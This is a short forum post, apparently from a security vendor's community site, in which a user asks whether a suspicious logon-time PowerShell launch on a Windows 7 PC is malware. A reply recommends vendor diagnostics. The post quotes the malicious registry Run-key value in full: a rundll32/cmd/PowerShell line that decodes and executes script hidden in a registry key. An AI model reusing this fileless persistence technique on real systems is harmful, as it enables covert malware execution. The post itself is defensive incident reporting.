today i discovered a windows 7 workstation that during the user access was starting a strange powershell script.
Looking in Run key of the registry i seen this string:
"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"
Loking in the registry key 9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F i see this data.
(The byte data is mutch longher)
Could be some king of malware?
I think you should use the built-in "F-Secure Support Tool" diagnostics on the computer, either through local run or activated remotely via centralized management and submit the resulting FSDIAG compressed file to F-Secure tech support. That often allows them to find out what's going on, even if an outright binary sample of the suspected malware cannot be located.
Best Regards: Tamas Feher, Hungary.
Visit the Community
Check our Forums or How-to & FAQs for advice or answers
View User Guides
Refer to our getting started guides and product manuals
Talk to our Support agents and get answers to your questions